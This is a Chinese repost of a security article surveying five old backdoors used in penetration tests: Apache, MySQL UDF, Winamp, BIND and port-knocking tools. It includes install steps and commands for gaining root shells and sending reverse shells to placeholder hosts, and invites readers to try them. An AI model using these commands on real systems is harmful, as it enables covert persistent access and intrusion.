老式后门之美:五种复古远程控制工具

目前,高级的rootkit技术可以帮助你在渗透中拿到一个shell后进行持久性控制。此外,还有供应商故意提供了一些植入后门,但那就是截然不同的故事了。尽管各式花样翻新的技术与代码层出不穷,可你还记得曾经用过的那些后门吗?

本文介绍了5种远程控制工具(Remote Administration Tools)RAT ,又称“后门”,这完全是根据作者个人喜好挑选的。这是我进行合法渗透测试时所使用的工具,它们对于验证渗透的持久性与测量防御手段的有效性提供了重要的帮助。

1.mod_rootme——Apache模块后门(2004)

“mod_rootme是一个非常酷的模块,它可以在Apache中安装一个后门,你只需要进行一个简单的GET请求,就可以拿到一个root权限的shell,并且在系统中没有任何日志记录。”

作为最著名的工具之一,你只需要执行一个简单的make命令来编译共享库,将它复制到模块目录,在httpd.conf中写入“LoadModule rootme2_module /usr/lib/apache2/modules/mod_rootme2.so”,然后使用‘apachetl stop;apachectl start’重启httpd后台进程。之后,通过“GET root”命令你就得到了一个root权限的shell。

2.raptor_winudf.sql —— MySQL UDF后门(2004-2006)

“这是一个基于UDF(用户定义函数)机制的MySQL后门工具。可以用它来产生一个反弹shell(netcat UDF监听80端口)或者执行一条系统命令(exec UDF)。”

对于这个后门,你可以使用一个简单的命令‘#mysql –h x.x.x.x < raptor_winudf.sql’将后门作为一个用户定义函数注入到MySQL中。这样你便可以从MySQL shell执行‘mysql > select exec('ipconfig > c:\\out.txt');’命令。

这个反弹shell实现了一个有趣的功能,可以使用命令‘mysql> select netcat('y.y.y.y');’来调用,之后就会发送一个交互式shell在指定的主机(y.y.y.y)的80端口上。

截图来源:infamoussyn

3. get_wbkdr.dll插件——Winamp播放器后门(2006)

“wbkdr是非常著名的高保真音乐播放器软件Winamp后门的一个POC,它利用了插件接口,在24501端口中调用cmd.exe。”

4.BIND反弹shell后门(2005)

BIND是世界上最流行的DNS服务器软件之一。这个后门使用了BIND未发布的补丁,是我的一个来自阿根廷的朋友开发的。基本上,需要你以root用户的身份来 打补丁、编译以及运行服务。一旦运行,用‘nslookup backdoorpassword:x.x.x.x:port target_DNS_server’ 发送一个DNS请求,将会在主机x.x.x.x的给定端口上触发一个反弹shell。

5.Knock-out—— 基于端口敲门(port-knocking)的后门

这是我使用数据包嗅探库libpcap(服务器)和数据包构造库libnet(客户端)制作的后门。我运用了端口敲门技术,它可以是一个绑定端口的shell也可以是一个反弹型的shell。服务器与客户端使用相同的配置文件来决定使用哪些端口以及发送每个网络包时间所需要的时间差。

Knock-out支持TCP和UDP,并且最近在Linux主机中仍然可以工作(测试系统Ubuntu Server 14.04)。

作者寄语

这些后门至今仍然有效,或许你可以尝试一下。同时,我鼓励大家与我们分享你见过的有趣的后门、你喜欢的后门、你用过的最特别的后门以及你所钟爱的后门。别忘了在Twitter上使用#oldschoolbackdoors(老式后门)标签!

<下载链接及更多详情请点击查看原文>

* 参考来源:ioactive,转载请注明来自FreeBuf黑客与极客(FreeBuf.COM)

原文发布于微信公众号 - FreeBuf(freebuf)

原文发表时间:2015-09-10

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏技巅

linux内核崩溃问题排查过程总结

57440
来自专栏IT大咖说

基于Spring Cloud及K8S构建微服务应用

摘要 广发证券蔡波斯先生通过三个大方向来为我们分享基于Spring Cloud及K8S构建微服务应用。 ? 基于Spring Cloud构建微服务 Netfli...

1.3K80
来自专栏冷冷

jfinal-swagger让你的应用接口更加简单

前言 前两天逛jfinal社区,看到jfinal-swagger项目,接触到swagger,研究了一番对部分代码进行修改,成功整合到LMS,支持jfinal 多...

30490
来自专栏coding

swoole框架-swoft初体验swoft环境搭建体验http服务体验ws服务初体验

没有swoole之前,php一直被"誉“为世界上最好的语言。swoole横空出世后,php就成了宇宙最好的语言了...

30210
来自专栏杨建荣的学习笔记

Datapump数据迁移前的准备工作(二)(r9笔记第59天)

之前写了一篇文章分析了Datapump迁移数据的一些准备总结,反响还不错。Datapump数据迁移前的准备工作,最近碰到一个场景,根据评估还是使用Datapum...

28940
来自专栏Java职业技术分享

这些保护Spring Boot 应用的方法,你都用了吗?

Spring Boot大大简化了Spring应用程序的开发。它的自动配置和启动依赖大大减少了开始一个应用所需的代码和配置量,如果你已经习惯了Spring和大量X...

8100
来自专栏FreeBuf

一款高度可定制的WiFi钓鱼工具 – WiFiPhisher

工具简介 WiFiPhisher是一款高度可定制的WiFi钓鱼攻击工具,它可以对具体的WiFI客户端进行攻击,例如获取用户凭证或感染恶意软件。与其他攻击不同的是...

622100
来自专栏冰霜之地

手把手教你利用Jenkins持续集成iOS项目

众所周知,现在App的竞争已经到了用户体验为王,质量为上的白热化阶段。用户们都是很挑剔的。如果一个公司的推广团队好不容易砸了重金推广了一个APP,好不容易有了一...

17530
来自专栏数据派THU

独家 | 手把手教你用Python 3创建用于机器学习开发的Linux虚拟机(附安装教程、代码)

原文标题:How to Create a Linux Virtual Machine For Machine Learning Development With...

28480
来自专栏沃趣科技

ASM 翻译系列第一弹:基础知识 ASM AU,Extents,Mirroring 和 Failgroups

原作者:Bane Radulovic 译者: 魏兴华 审核: 魏兴华 ASM Allocation Units 在ASM磁盘组中,最基本空间分配单位...

36170

扫码关注云+社区

领取腾讯云代金券